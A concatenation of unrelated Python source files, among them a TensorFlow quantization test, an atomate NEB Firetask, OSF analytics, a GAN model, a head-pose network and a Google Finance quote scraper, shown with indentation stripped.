inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
first_conv_or_matmul_quantization: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_first_quantization.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_disable_scale_propagation():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_max_pooling: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_scale_propagation.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_scale_propagation():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_max_pooling: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_scale_propagation.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_scale_unification():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_concat: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_scale_unification.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_disable_scale_unification():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_concat: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_scale_unification.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
class TestTensorflowInt8Recipe(unittest.TestCase):
@classmethod
def setUpClass(self):
build_fake_yaml_disable_first_quantization()
build_fake_yaml_enable_first_quantization()
build_fake_yaml_disable_scale_propagation()
build_fake_yaml_enable_scale_propagation()
build_fake_yaml_enable_scale_unification()
build_fake_yaml_disable_scale_unification()
@classmethod
def tearDownClass(self):
os.remove('fake_yaml_disable_first_quantization.yaml')
os.remove('fake_yaml_enable_first_quantization.yaml')
os.remove('fake_yaml_disable_scale_propagation.yaml')
os.remove('fake_yaml_enable_scale_propagation.yaml')
os.remove('fake_yaml_disable_scale_unification.yaml')
os.remove('fake_yaml_enable_scale_unification.yaml')
@disable_random()
def test_disable_first_quantization(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
relu6 = tf.nn.relu6(relu, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_first_quantization.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
found_fp32_conv = False
for i in output_graph.graph_def.node:
if i.op == 'Conv2D':
found_fp32_conv = True
break
self.assertEqual(found_fp32_conv, True)
@disable_random()
def test_enable_first_quantization(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
relu6 = tf.nn.relu6(relu, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_first_quantization.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
found_fp32_conv = False
for i in output_graph.graph_def.node:
if i.op == 'Conv2D':
found_fp32_conv = True
break
self.assertEqual(found_fp32_conv, False)
@disable_random()
def test_enable_scale_propagation(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
conv = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
pool = tf.nn.avg_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv1 = tf.nn.conv2d(pool, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
x = tf.nn.relu(conv_bias)
final_node = tf.nn.relu(x, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_scale_propagation.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(1, len(set(max_freezed_out)))
@disable_random()
def test_disable_scale_propagation(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
conv = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
pool = tf.nn.avg_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv1 = tf.nn.conv2d(pool, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
x = tf.nn.relu(conv_bias)
final_node = tf.nn.relu(x, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_scale_propagation.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(2, len(set(max_freezed_out)))
@disable_random()
def test_enable_scale_unification(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 128, 128, 16], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
sqrt = tf.math.sqrt(x)
relu_sqrt = tf.nn.relu(sqrt)
conv = tf.nn.conv2d(relu_sqrt, conv_weights, strides=[
1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
conv1 = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
relu1 = tf.nn.relu(conv_bias)
concat = tf.concat([relu, relu1], 1)
final_node = tf.nn.relu(concat, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_scale_unification.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 128, 128, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(1, len(set(max_freezed_out)))
@disable_random()
def test_disable_scale_unification(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
sqrt = tf.math.sqrt(x)
relu_sqrt = tf.nn.relu(sqrt)
conv = tf.nn.conv2d(relu_sqrt, conv_weights, strides=[
1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
conv1 = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
relu1 = tf.nn.relu(conv_bias)
concat = tf.concat([relu, relu1], 1)
final_node = tf.nn.relu(concat, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_scale_unification.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(2, len(set(max_freezed_out)))
if __name__ == '__main__':
unittest.main()
|
atomate/vasp/firetasks/approx_neb_dynamic_tasks.py
|
rkingsbury/atomate
| 167 |
101493
|
from fireworks import FiretaskBase, FWAction, explicit_serialize, Workflow
from atomate.utils.utils import env_chk
from atomate.vasp.database import VaspCalcDb
from atomate.vasp.fireworks.approx_neb import ImageFW
from atomate.common.powerups import powerup_by_kwargs
__author__ = "<NAME>"
__email__ = "<EMAIL>"
@explicit_serialize
class GetImageFireworks(FiretaskBase):
"""
Adds ImageFWs to the workflow for the provided images_key
according to the scheme specified by launch_mode. Optional
parameters such as "handler_group", "add_additional_fields",
and "add_tags" can be used to modify the resulting ImageFWs.
Args:
db_file (str): path to file containing the database
credentials.
approx_neb_wf_uuid (str): unique id for approx neb workflow
record keeping.
images_key (str): specifies a key corresponding the images
field of the approx_neb collection which specifies the
desired combination of end points to interpolate images
between. images_key should be a string of format "0+1",
"0+2", etc. matching end_points_combo input of
PathfinderToDb Firetask or pathfinder_key input of
AddSelectiveDynamics Firetask. If images_key is not
provided images will be launched for all paths/keys in
the approx_neb collection images field.
launch_mode (str): "all" or "screening"
vasp_cmd (str): the name of the full executable for running
VASP.
Optional Params:
vasp_input_set (VaspInputSet class): can use to
define VASP input parameters.
See pymatgen.io.vasp.sets module for more
information. MPRelaxSet() and
override_default_vasp_params are used if
vasp_input_set = None.
override_default_vasp_params (dict): if provided,
vasp_input_set is disregarded and the Vasp Input
Set is created by passing
override_default_vasp_params to MPRelaxSet().
Allows for easy modification of MPRelaxSet().
For example, to set ISIF=2 in the INCAR use:
{"user_incar_settings":{"ISIF":2}}
handler_group (str or [ErrorHandler]): group of handlers to
use for RunVaspCustodian firetask. See handler_groups
dict in the code for the groups and complete list of
handlers in each group. Alternatively, you can specify a
list of ErrorHandler objects.
add_additional_fields (dict): dict of additional fields to
add to task docs (by additional_fields of VaspToDb).
add_tags (list of strings): added to the "tags" field of the
task docs.
"""
required_params = [
"db_file",
"approx_neb_wf_uuid",
"images_key",
"launch_mode",
"vasp_cmd",
]
optional_params = [
"vasp_input_set",
"override_default_vasp_params",
"handler_group",
"add_additional_fields",
"add_tags",
]
def run_task(self, fw_spec):
# get the database connection
db_file = env_chk(self["db_file"], fw_spec)
mmdb = VaspCalcDb.from_db_file(db_file, admin=True)
mmdb.collection = mmdb.db["approx_neb"]
wf_uuid = self["approx_neb_wf_uuid"]
launch_mode = self["launch_mode"]
images_key = self["images_key"]
approx_neb_doc = mmdb.collection.find_one({"wf_uuid": wf_uuid}, {"images": 1})
all_images = approx_neb_doc["images"]
# get structure_path of desired images and sort into structure_paths
if images_key and isinstance(all_images, (dict)):
images = all_images[images_key]
max_n = len(images)
if launch_mode == "all":
structure_paths = [
"images." + images_key + "." + str(n) + ".input_structure"
for n in range(0, max_n)
]
elif launch_mode == "screening":
structure_paths = self.get_and_sort_paths(
max_n=max_n, images_key=images_key
)
elif isinstance(all_images, (dict)):
structure_paths = dict()
if launch_mode == "all":
for key, images in all_images.items():
max_n = len(images)
structure_paths[key] = [
"images." + key + "." + str(n) + ".input_structure"
for n in range(0, max_n)
]
elif launch_mode == "screening":
for key, images in all_images.items():
structure_paths[key] = self.get_and_sort_paths(
max_n=len(images), images_key=key
)
# get list of fireworks to launch
if isinstance(structure_paths, (list)):
if isinstance(structure_paths[0], (str)):
relax_image_fws = []
for path in structure_paths:
relax_image_fws.append(self.get_fw(structure_path=path))
else:
relax_image_fws = self.get_screening_fws(sorted_paths=structure_paths)
elif isinstance(structure_paths, (dict)):
relax_image_fws = []
if launch_mode == "all":
for key in structure_paths.keys():
for path in structure_paths[key]:
relax_image_fws.append(self.get_fw(structure_path=path))
elif launch_mode == "screening":
for key in structure_paths.keys():
sorted_paths = structure_paths[key]
relax_image_fws.extend(
self.get_screening_fws(sorted_paths=sorted_paths)
)
# place fws in temporary wf in order to use powerup_by_kwargs
# to apply powerups to image fireworks
if "vasp_powerups" in fw_spec.keys():
temp_wf = Workflow(relax_image_fws)
powerup_dicts = fw_spec["vasp_powerups"]
temp_wf = powerup_by_kwargs(temp_wf, powerup_dicts)
relax_image_fws = temp_wf.fws
return FWAction(additions=relax_image_fws)
def get_and_sort_paths(self, max_n, images_key=""):
sorted_paths = [[], [], []]
mid_n = int(max_n / 2)
q1 = int((max_n - mid_n) / 2) # for second screening pass
q3 = int((max_n + mid_n) / 2) # for second screening pass
for n in range(0, max_n):
path = "images." + images_key + "." + str(n) + ".input_structure"
if n == mid_n: # path for first screening pass (center image index)
sorted_paths[0].append(path)
elif n in [q1, q3]:
sorted_paths[1].append(path)
else:
sorted_paths[-1].append(path)
return sorted_paths
def get_fw(self, structure_path, parents=None):
add_tags = self.get("add_tags")
fw = ImageFW(
approx_neb_wf_uuid=self["approx_neb_wf_uuid"],
structure_path=structure_path,
db_file=self["db_file"],
vasp_input_set=self.get("vasp_input_set"),
vasp_cmd=self["vasp_cmd"],
override_default_vasp_params=self.get("override_default_vasp_params"),
handler_group=self.get("handler_group"),
parents=parents,
add_additional_fields=self.get("add_additional_fields"),
add_tags=add_tags,
)
if isinstance(add_tags, (list)):
if "tags" in fw.spec.keys():
fw.spec["tags"].extend(add_tags)
else:
fw.spec["tags"] = add_tags
return fw
def get_screening_fws(self, sorted_paths):
if isinstance(sorted_paths, (list)) != True:
if (
any([isinstance(i, (list)) for i in sorted_paths]) != True
or len(sorted_paths) != 3
):
raise TypeError("sorted_paths must be a list containing 3 lists")
s1_fw = self.get_fw(structure_path=sorted_paths[0][0])
# ToDo: modify this firework to add firetask that checks whether to run/defuse children
s2_fws = []
for path in sorted_paths[1]:
s2_fws.append(self.get_fw(structure_path=path, parents=s1_fw))
# ToDo: modify this firework to add firetask that checks whether to run/defuse children
remaining_fws = []
for path in sorted_paths[-1]:
remaining_fws.append(self.get_fw(structure_path=path, parents=s2_fws))
return [s1_fw] + s2_fws + remaining_fws
|
certstream/__init__.py
|
costasko/certstream-python
| 331 |
101498
|
from .core import listen_for_events
|
scripts/analytics/file_summary.py
|
gaybro8777/osf.io
| 628 |
101499
|
<filename>scripts/analytics/file_summary.py
import django
django.setup()
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q
import logging
from dateutil.parser import parse
from datetime import datetime, timedelta
from django.utils import timezone
from osf.models import AbstractNode, Preprint
from website.app import init_app
from scripts.analytics.base import SummaryAnalytics
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class FileSummary(SummaryAnalytics):
@property
def collection_name(self):
return 'file_summary'
def get_events(self, date):
super(FileSummary, self).get_events(date)
from addons.osfstorage.models import OsfStorageFile
# Convert to a datetime at midnight for queries and the timestamp
timestamp_datetime = datetime(date.year, date.month, date.day).replace(tzinfo=timezone.utc)
file_qs = OsfStorageFile.objects
abstract_node_content_type = ContentType.objects.get_for_model(AbstractNode)
preprint_content_type = ContentType.objects.get_for_model(Preprint)
public_query = Q(
target_object_id__in=AbstractNode.objects.filter(is_public=True).values('id'),
target_content_type__in=[abstract_node_content_type, preprint_content_type],
)
private_query = Q(
target_object_id__in=AbstractNode.objects.filter(is_public=False).values('id'),
target_content_type__in=[abstract_node_content_type, preprint_content_type],
)
daily_query = Q(created__gte=timestamp_datetime)
totals = {
'keen': {
'timestamp': timestamp_datetime.isoformat()
},
# OsfStorageFiles - the number of files on OsfStorage
'osfstorage_files_including_quickfiles': {
'total': file_qs.count(),
'public': file_qs.filter(public_query).count(),
'private': file_qs.filter(private_query).count(),
'total_daily': file_qs.filter(daily_query).count(),
'public_daily': file_qs.filter(public_query & daily_query).count(),
'private_daily': file_qs.filter(private_query & daily_query).count(),
},
}
logger.info(
'OsfStorage Files counted. Files: {}'.format(
totals['osfstorage_files_including_quickfiles']['total'],
)
)
return [totals]
def get_class():
return FileSummary
if __name__ == '__main__':
init_app()
file_summary = FileSummary()
args = file_summary.parse_args()
yesterday = args.yesterday
if yesterday:
date = (timezone.now() - timedelta(days=1)).date()
else:
date = parse(args.date).date() if args.date else None
events = file_summary.get_events(date)
file_summary.send_events(events)
|
vegans/models/unconditional/LRGAN.py
|
unit8co/vegans
| 459 |
101517
|
"""
LRGAN
-----
Implements the latent regressor GAN well described in the BicycleGAN paper[1].
It introduces an encoder network which maps the generator output back to the latent
input space. This should help to prevent mode collapse and improve image variety.
Losses:
- Generator: Binary cross-entropy + L1-latent-loss (Mean Absolute Error)
- Discriminator: Binary cross-entropy
- Encoder: L1-latent-loss (Mean Absolute Error)
Default optimizer:
- torch.optim.Adam
Custom parameter:
- lambda_z: Weight for the reconstruction loss for the latent z dimensions.
References
----------
.. [1] https://arxiv.org/pdf/1711.11586.pdf
"""
import torch
from torch.nn import L1Loss
from vegans.utils.networks import Generator, Adversary, Encoder
from vegans.models.unconditional.AbstractGANGAE import AbstractGANGAE
class LRGAN(AbstractGANGAE):
"""
Parameters
----------
generator: nn.Module
Generator architecture. Produces output in the real space.
adversary: nn.Module
Adversary architecture. Produces predictions for real and fake samples to differentiate them.
encoder: nn.Module
Encoder architecture. Produces predictions in the latent space.
x_dim : list, tuple
Number of the output dimensions of the generator and input dimension of the discriminator / critic.
In the case of images this will be [nr_channels, nr_height_pixels, nr_width_pixels].
z_dim : int, list, tuple
Number of the latent dimensions for the generator input. Might have dimensions of an image.
optim : dict or torch.optim
Optimizer used for each network. Could be either an optimizer from torch.optim or a dictionary with network
name keys and torch.optim as value, i.e. {"Generator": torch.optim.Adam}.
optim_kwargs : dict
Optimizer keyword arguments used for each network. Must be a dictionary with network
name keys and dictionary with keyword arguments as value, i.e. {"Generator": {"lr": 0.0001}}.
lambda_z: float
Weight for the reconstruction loss for the latent z dimensions.
adv_type: "Discriminator", "Critic" or "Autoencoder"
Indicating which adversarial architecture will be used.
feature_layer : torch.nn.*
Output layer used to compute the feature loss. Should be from either the discriminator or critic.
If `feature_layer` is not None, the original generator loss is replaced by a feature loss, introduced
[here](https://arxiv.org/abs/1606.03498v1).
fixed_noise_size : int
Number of images shown when logging. The fixed noise is used to produce the images in the folder/images
subdirectory, the tensorboard images tab and the samples in get_training_results().
device : string
Device used while training the model. Either "cpu" or "cuda".
ngpu : int
Number of gpus used during training if device == "cuda".
folder : string
Creates a folder in the current working directory with this name. All relevant files like summary, images, models and
tensorboard output are written there. Existing folders are never overwritten or deleted. If a folder with the same name
already exists a time stamp is appended to make it unique.
"""
#########################################################################
# Actions before training
#########################################################################
def __init__(
self,
generator,
adversary,
encoder,
x_dim,
z_dim,
optim=None,
optim_kwargs=None,
lambda_z=10,
adv_type="Discriminator",
feature_layer=None,
fixed_noise_size=32,
device=None,
ngpu=0,
folder="./veganModels/LRGAN",
secure=True):
super().__init__(
generator=generator, adversary=adversary, encoder=encoder,
x_dim=x_dim, z_dim=z_dim, optim=optim, optim_kwargs=optim_kwargs, adv_type=adv_type, feature_layer=feature_layer,
fixed_noise_size=fixed_noise_size, device=device, ngpu=ngpu, folder=folder, secure=secure
)
self.lambda_z = lambda_z
self.hyperparameters["lambda_z"] = lambda_z
if self.secure:
assert self.encoder.output_size == self.z_dim, (
"Encoder output shape must be equal to z_dim. {} vs. {}.".format(self.encoder.output_size, self.z_dim)
)
def _define_loss(self):
loss_functions = super()._define_loss()
loss_functions.update({"L1": L1Loss()})
return loss_functions
#########################################################################
# Actions during training
#########################################################################
def _calculate_generator_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch)
fake_Z = self.encode(x=fake_images)
if self.feature_layer is None:
fake_predictions = self.predict(x=fake_images)
gen_loss_original = self.loss_functions["Generator"](
fake_predictions, torch.ones_like(fake_predictions, requires_grad=False)
)
else:
gen_loss_original = self._calculate_feature_loss(X_real=X_batch, X_fake=fake_images)
latent_space_regression = self.loss_functions["L1"](
fake_Z, Z_batch
)
gen_loss = gen_loss_original + self.lambda_z*latent_space_regression
return {
"Generator": gen_loss,
"Generator_Original": gen_loss_original,
"Generator_L1": self.lambda_z*latent_space_regression
}
def _calculate_encoder_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch).detach()
fake_Z = self.encode(x=fake_images)
latent_space_regression = self.loss_functions["L1"](
fake_Z, Z_batch
)
return {
"Encoder": latent_space_regression
}
def _calculate_adversary_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch).detach()
fake_predictions = self.predict(x=fake_images)
real_predictions = self.predict(x=X_batch)
adv_loss_fake = self.loss_functions["Adversary"](
fake_predictions, torch.zeros_like(fake_predictions, requires_grad=False)
)
adv_loss_real = self.loss_functions["Adversary"](
real_predictions, torch.ones_like(real_predictions, requires_grad=False)
)
adv_loss = 0.5*(adv_loss_fake + adv_loss_real)
return {
"Adversary": adv_loss,
"Adversary_fake": adv_loss_fake,
"Adversary_real": adv_loss_real,
"RealFakeRatio": adv_loss_real / adv_loss_fake
}
|
facexlib/headpose/hopenet_arch.py
|
spy14414/facexlib
| 164 |
101521
|
import torch
import torch.nn as nn
import torchvision
class HopeNet(nn.Module):
# Hopenet with 3 output layers for yaw, pitch and roll
# Predicts Euler angles by binning and regression with the expected value
def __init__(self, block, layers, num_bins):
super(HopeNet, self).__init__()
if block == 'resnet':
block = torchvision.models.resnet.Bottleneck
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(7)
self.fc_yaw = nn.Linear(512 * block.expansion, num_bins)
self.fc_pitch = nn.Linear(512 * block.expansion, num_bins)
self.fc_roll = nn.Linear(512 * block.expansion, num_bins)
self.idx_tensor = torch.arange(66).float()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
@staticmethod
def softmax_temperature(tensor, temperature):
result = torch.exp(tensor / temperature)
result = torch.div(result, torch.sum(result, 1).unsqueeze(1).expand_as(result))
return result
def bin2degree(self, predict):
predict = self.softmax_temperature(predict, 1)
return torch.sum(predict * self.idx_tensor.type_as(predict), 1) * 3 - 99
def forward(self, x):
x = self.relu(self.bn1(self.conv1(x)))
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
pre_yaw = self.fc_yaw(x)
pre_pitch = self.fc_pitch(x)
pre_roll = self.fc_roll(x)
yaw = self.bin2degree(pre_yaw)
pitch = self.bin2degree(pre_pitch)
roll = self.bin2degree(pre_roll)
return yaw, pitch, roll
|
recipes/Python/535165_stock_market_check_v2/recipe-535165.py
|
tdiprima/code
| 2,023 |
101540
|
from threading import Thread
from time import sleep
from PythonCard import model
import urllib
import re
def get_quote(symbol):
global quote
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('class="pr".*?>(.*?)<', content)
if m:
quote = m.group(1)
else:
quote = 'N/A'
return quote
def get_change(symbol):
global change
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('class="chg".*?>(.*?)<', content)
if m:
change = m.group(1)
else:
change = 'N/A'
return change
def get_open(symbol):
global opens
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?op".*?>(.*?)<', content)
if m:
opens = m.group(1)
else:
opens = 'N/A'
return opens
def get_high(symbol):
global high
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?hi".*?>(.*?)<', content)
if m:
high = m.group(1)
else:
high = 'N/A'
return high
def get_high52(symbol):
global high52
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?hi52".*?>(.*?)<', content)
if m:
high52 = m.group(1)
else:
high52 = 'N/A'
return high52
def get_low(symbol):
global low
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?lo".*?>(.*?)<', content)
if m:
low = m.group(1)
else:
low = 'N/A'
return low
